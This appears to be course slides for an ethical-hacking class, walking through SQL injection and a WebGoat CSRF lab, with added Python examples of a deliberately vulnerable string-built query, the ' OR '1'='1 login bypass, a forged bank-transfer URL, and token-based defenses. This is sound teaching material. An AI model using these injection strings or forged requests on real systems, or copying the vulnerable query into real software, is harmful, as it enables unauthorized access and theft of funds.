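As an added example (not part of the lesson or of Mutillidae), the following Python script models the User Info lookup above against an in-memory SQLite table with constructed sample accounts, contrasting string-built SQL with the parameterized query that OWASP's option 1 under "How Do I Prevent 'Injection'?" calls for. SQLite, unlike the MySQL behind Mutillidae, compares the integer 1 and the text '1' as unequal, so the injected password is written ' OR '1'='1, the same trick as the lesson's ' OR 1='1.

```python
import sqlite3

# Constructed stand-in for Mutillidae's accounts table (sample data, not the lab's).
SAMPLE_ACCOUNTS = [
    ("simben76", "letmein", "my signature"),
    ("alice", "wonderland", "hello"),
    ("bob", "builder", "can we fix it"),
]


def make_db():
    """In-memory SQLite database loaded with the sample accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (username TEXT, password TEXT, "
                 "mysignature TEXT)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?, ?)", SAMPLE_ACCOUNTS)
    return conn


def build_query_vulnerable(username, password):
    """The Mutillidae-style bug: input is concatenated into the SQL text, so the
    quote in the password closes the string literal and the rest is parsed as
    SQL. Returned as a string so the altered WHERE clause can be inspected."""
    return ("SELECT username, password, mysignature FROM accounts "
            f"WHERE username='{username}' AND password='{password}'")


def user_info_vulnerable(conn, username, password):
    """Run the concatenated query: AND binds tighter than OR, so the tail
    OR '1'='1' makes the WHERE clause true for every row."""
    return conn.execute(build_query_vulnerable(username, password)).fetchall()


def user_info_safe(conn, username, password):
    """OWASP option 1: a parameterized query. The driver binds the values
    separately from the SQL text, so a quote in the input stays data."""
    sql = ("SELECT username, password, mysignature FROM accounts "
           "WHERE username=? AND password=?")
    return conn.execute(sql, (username, password)).fetchall()


if __name__ == "__main__":
    db = make_db()
    bad_password = "' OR '1'='1"   # same trick as the lesson's ' OR 1='1
    print(build_query_vulnerable("simben76", bad_password))
    print("vulnerable:   ", user_info_vulnerable(db, "simben76", bad_password))
    print("parameterized:", user_info_safe(db, "simben76", bad_password))
```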

A8 Cross-Site Request Forgery (CSRF)

Cross-Site Request Forgery (CSRF)

• Another malicious type of attack on a website.

• Also known as a "one-click attack" or "session riding"
attack.

• The browser must already be authenticated on a legitimate
website and is therefore "trusted" by that web application.

• The browser is then tricked into sending unauthorized
malicious (forged) requests to that website.

• This vulnerability can be extremely dangerous ... think
online banking.

https://en.wikipedia.org/wiki/Cross-site_request_forgery
Cross-Site Request Forgery (CSRF)

OWASP Risk Rating

https://www.owasp.org/index.php/Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF)

Cross-Site Request Forgery (CSRF)

https://www.youtube.com/watch?v=vRBihr41JTo

OWASP CSRF Prevention

How Do I Prevent 'Cross-Site Request Forgery (CSRF)'?


Preventing CSRF usually requires the inclusion of an unpredictable
token in each HTTP request. Such tokens should, at a minimum, be
unique per user session.

1. The preferred option is to include the unique token in a hidden
field. This causes the value to be sent in the body of the HTTP
request, avoiding its inclusion in the URL, which is more prone to
exposure.
2. The unique token can also be included in the URL itself, or a URL
parameter. However, such placement runs a greater risk that the
URL will be exposed to an attacker, thus compromising the secret
token.
3. OWASP’s CSRF Guard can automatically include such tokens in
Java EE, .NET, or PHP apps. OWASP’s ESAPI includes methods
developers can use to prevent CSRF vulnerabilities.
4. Requiring the user to reauthenticate, or prove they are a user
(e.g., via a CAPTCHA) can also protect against CSRF.

https://www.owasp.org/index.php/Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF)

CSRF Example References and Credits

https://www.tutorialspoint.com/security_testing/index.htm
Lots and lots of hacking tutorials

https://www.tutorialspoint.com/security_testing/pdf/cross_site_request_forgery.pdf
PDF of the CSRF testing tutorial

http://10.76.xx.101/WebGoat/source?solution=true
Solution page on OWASP VM website

Cross-Site Request Forgery (CSRF)

Example Overview:

In this WebGoat example malicious HTML code is inserted into a
post on a forum-like web application. This code is stored in the
database and isn't rendered until a user reads the post. When
the malicious code is activated the browser will be tricked into
sending an unauthorized (forged) request to another website.
The browser thinks it is getting an image file to display; however,
there is no image.

We will browse to the WebGoat application using Firefox on
EH-Kali. Burp Suite will be used on EH-Kali as a web proxy so we
can intercept and monitor every request the browser makes.

Cross-Site Request Forgery (CSRF) Setup

[EH-Kali] Burp Suite on EH-Kali-xx

Accept the license agreement

Use the current version

Cross-Site Request Forgery (CSRF) Setup

[EH-Kali] Burp Suite

Select "Temporary project" and click the Next button

Cross-Site Request Forgery (CSRF) Setup

[EH-Kali] Burp Suite

Select "Use Burp defaults" and click the Start Burp button

Cross-Site Request Forgery (CSRF) Setup

[EH-Kali] Burp Suite

Click the Proxy tab

Cross-Site Request Forgery (CSRF) Setup

[EH-Kali] Burp Suite

Click the Options tab and verify Burp Suite is listening on port 8080

Cross-Site Request Forgery (CSRF) Setup

[EH-Kali] Burp Suite

Click the Intercept tab to monitor browser requests

Cross-Site Request Forgery (CSRF) Setup


[EH-Kali] Firefox

Switch to Workspace 2 and run Firefox

Cross-Site Request Forgery (CSRF) Setup


[EH-Kali] Firefox

Select Preferences

Cross-Site Request Forgery (CSRF) Setup


[EH-Kali] Firefox

Advanced > Network > Settings...

Cross-Site Request Forgery (CSRF) Setup


[EH-Kali] Firefox

This will configure the browser to use the Burp Suite as a
proxy service. This enables the Burp Suite to intercept and
monitor all Firefox browser requests.

Configure the proxy service as shown above

Cross-Site Request Forgery (CSRF) Setup

[EH-Kali] Firefox browse to http://10.76.xx.101

Scroll down a little

We are using Pod 5 for this example

From your Kali VM, browse to your OWASP VM and head to WebGoat

Cross-Site Request Forgery (CSRF) Setup

[EH-Kali] Burp Suite

Back on workspace 1 click the Forward button on Burp Suite

Cross-Site Request Forgery (CSRF) Setup

[EH-Kali] Burp Suite

Login to WebGoat with username and password = guest

Cross-Site Request Forgery (CSRF) Setup


[EH-Kali] Burp Suite

Click Forward to continue

Cross-Site Request Forgery (CSRF) Setup


[EH-Kali] Firefox

Scroll down a bit

In workspace 1 start WebGoat

Cross-Site Request Forgery (CSRF) Setup


[EH-Kali] Burp Suite

Click Forward on Burp Suite to continue

Cross-Site Request Forgery (CSRF) Setup


[EH-Kali] Firefox

Scroll down a little

Navigate on the left panel to Cross Site Request Forgery (CSRF)

Cross-Site Request Forgery (CSRF) Setup


[EH-Kali] Burp Suite

Click Forward on Burp Suite to continue

Cross-Site Request Forgery (CSRF) Setup


[EH-Kali] Firefox

Fill out the form and click the Submit button

Cross-Site Request Forgery (CSRF) Setup


[EH-Kali] Burp Suite

Click Forward on Burp Suite to continue

Cross-Site Request Forgery (CSRF) Setup


[EH-Kali] Terminal
scp xxxxxx76@opus-ii:../depot/lesson12/csrf/* .
cat payload

In workspace 3 open a terminal and copy the payload file from Opus-II

Cross-Site Request Forgery (CSRF) Setup


[EH-Kali] Firefox

Update to your pod number

Create a new message using the malicious HTML payload (copy and paste
from the terminal) to transfer bank funds

Cross-Site Request Forgery (CSRF) Setup


[EH-Kali] Burp Suite

Click Forward on Burp Suite to continue

Cross-Site Request Forgery (CSRF) Setup


[EH-Kali] Burp Suite

Click Forward on Burp Suite to continue

Cross-Site Request Forgery (CSRF) Setup


[EH-Kali] Firefox

Select the message with the malicious payload


Cross-Site Request Forgery (CSRF) Setup


[EH-Kali] Burp Suite

Click Forward on Burp Suite to continue

Cross-Site Request Forgery (CSRF) Setup


[EH-Kali] Burp Suite

Note the GET request containing the malicious URL, which
requests the transfer of the bank funds to the attacker
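The WebGoat exchange above, restated as an added Python example (not WebGoat's or the lesson's code), together with OWASP option 1 from "How Do I Prevent 'Cross-Site Request Forgery (CSRF)'?": a minimal transfer endpoint that issues a per-session token in a hidden form field and rejects the bare GET that the malicious <img> tag makes the victim's browser send. SESSIONS, BALANCES, the /transfer handler and the host bank.example are constructed stand-ins.

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlparse

# Constructed in-memory stand-ins for WebGoat's session store and bank accounts.
SESSIONS = {}                              # session id -> {"user", "csrf_token"}
BALANCES = {"guest": 1000, "attacker": 0}  # sample balances


def new_session(user):
    """Log a user in; the browser presents this id as a cookie from now on."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = {"user": user, "csrf_token": secrets.token_urlsafe(32)}
    return sid


def transfer_form_html(session_id):
    """OWASP option 1: the per-session token travels in a hidden field, so only
    a POST built from the genuine form carries it in the request body."""
    token = SESSIONS[session_id]["csrf_token"]
    return ('<form method="POST" action="/transfer">'
            f'<input type="hidden" name="csrf_token" value="{token}">'
            '<input name="to"><input name="amount"><input type="submit"></form>')


def handle_transfer(session_id, method, body):
    """Server side. The session cookie arrives automatically on every request,
    which is exactly what CSRF rides on, so it proves nothing about intent;
    the token, which a page on another site cannot read, does."""
    session = SESSIONS.get(session_id)
    if session is None:
        return "401 not logged in"
    if method != "POST":
        return "405 state-changing requests must be POSTed"
    params = parse_qs(body)
    sent = params.get("csrf_token", [""])[0]
    if not hmac.compare_digest(sent.encode(), session["csrf_token"].encode()):
        return "403 missing or invalid CSRF token"
    to, amount = params["to"][0], int(params["amount"][0])
    BALANCES[session["user"]] -= amount
    BALANCES[to] += amount
    return "200 transfer complete"


def forged_request_from_img(session_id, img_src):
    """What the malicious <img> in the forum post makes the victim's browser do:
    a GET to the transfer URL with the victim's cookie and no token attached."""
    return handle_transfer(session_id, "GET", urlparse(img_src).query)


if __name__ == "__main__":
    sid = new_session("guest")
    print(forged_request_from_img(sid, "http://bank.example/transfer?to=attacker&amount=500"))
    token = SESSIONS[sid]["csrf_token"]
    print(handle_transfer(sid, "POST", f"csrf_token={token}&to=attacker&amount=5"))
    print(BALANCES)
```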
When finished using the Burp Suite, disable the proxy settings in
your browser:

"Pancakes" icon
> Preferences
> Advanced
> Network
> Settings...
> Select "No proxy"
Assignment

Lab 10 - the LAST one!

Wrap up

Next Class
Assignment: Check the Calendar Page on the web site to
see what is due next week.

Quiz questions for next class:

• Using ' OR 1='1 as the password to log into a web application is what
kind of attack?

• What is the difference between stored and reflected cross-site scripting?

• The Burp Suite can be used as a HTTP proxy server (T or F)?

Backup